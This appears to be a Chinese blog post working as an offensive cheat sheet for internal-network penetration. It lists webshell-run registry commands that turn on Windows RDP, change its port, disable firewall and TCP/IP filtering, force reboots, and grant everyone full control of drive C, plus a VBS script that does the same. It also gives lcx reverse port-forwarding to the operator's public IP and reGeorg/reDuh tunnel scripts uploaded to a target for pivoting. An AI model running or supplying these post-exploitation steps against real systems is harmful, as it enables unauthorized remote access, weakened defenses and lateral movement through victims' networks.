内网远程连接

作者: 卿酌南烛_b805 | 来源:发表于2020-08-25 16:13 被阅读0次

    🎃一、通过webshell开启3389

    1.查询终端端口

    xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
    

    通用:

    regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
    type tsp.reg
    

    2.开启XP&2003终端服务

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    

    3.更改终端端口为20008(0x4E28)

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
    
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
    

    4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制

    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
    

    5.开启Win2000的终端,端口为3389(需重启)

    echo Windows Registry Editor Version 5.00 >2000.reg
    echo. >>2000.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
    echo "Enabled"="0" >>2000.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
    echo "ShutdownWithoutLogon"="0" >>2000.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
    echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
    echo "TSEnabled"=dword:00000001 >>2000.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
    echo "Start"=dword:00000002 >>2000.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
    echo "Start"=dword:00000002 >>2000.reg
    echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
    echo "Hotkey"="1" >>2000.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
    echo "PortNumber"=dword:00000D3D >>2000.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
    echo "PortNumber"=dword:00000D3D >>2000.reg
    

    6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)

    @ECHO OFF & cd/d %temp% & echo [version] > restart.inf
    (set inf=InstallHinfSection DefaultInstall)
    echo signature=$chicago$ >> restart.inf
    echo [defaultinstall] >> restart.inf
    rundll32 setupapi,%inf% 1 %temp%\restart.inf
    

    7.禁用TCP/IP端口筛选 (需重启)

    REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
    

    8.终端超出最大连接数时可用下面的命令来连接

    mstsc /v:ip:3389 /console
    

    9.调整NTFS分区权限

    cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
    
    cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
    
    ------------------------------------------------------
    3389.vbs cscript.exe
    ------------------------------------------------------
    
    On Error Resume Next
    const HKEY_LOCAL_MACHINE = &H80000002
    strComputer = "."
    Set StdOut = WScript.StdOut
    Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
    strComputer & "\root\default:StdRegProv")
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
    oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
    oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
    strValueName = "fDenyTSConnections"
    dwValue = 0
    oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
    strValueName = "PortNumber"
    dwValue = 3389
    oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
    strValueName = "PortNumber"
    dwValue = 3389
    oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
    Set R = CreateObject("WScript.Shell")
    R.run("Shutdown.exe -r -t 0")
    

    2、通过3389工具开启远程终端

    服务器端口被修改如何查找

        目前主要通过注册表读取、端口扫描、命令探针等三种方法查找修改后的端口
    

    服务器处于内网如何远程连接

    1、拥有公网ip的条件下

    1、通过lcx工具解决内网远程连接
    上传一个cmd.exe文件和lck工具然后setp cmd.exe设置终端路径解决运行权限问题。

    Webshell上执行:lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389 (将本机3389端口流量转发到公网ip的2222端口上去)

    自己的电脑里面执行:lcx.exe -listen 2222 4444 (监听本地的2222端口将流量转发到4444 )

    二、没有公网ip的情况下

    通过端口转发脚本解决内网远程连接

    只能通过内网的web进行连接
    使用reDuhGUI_0.1工具利用菜刀将reDuh.php脚本上传到靶机。然后双击物理机的reDuhGUI.exe运行脚本
    如果有安全狗会被拦截

    内网渗透(内到内到内渗透)

    内网渗透使用这两个工具–reGeorg+Proxifier
    首先进入regeorg文件将tunnel.nosocket.php上传到靶机web根目录本地python运行 pip install urllib3环境下执行cmd
    reGeorg-master\reGeorgSocksProxy.py -p 9999 -u http://192.168.60.118:8080/tunnel.nosocket.php

    image.png

    相关文章

      网友评论

        本文标题:内网远程连接

        本文链接:https://www.haomeiwen.com/subject/nirojktx.html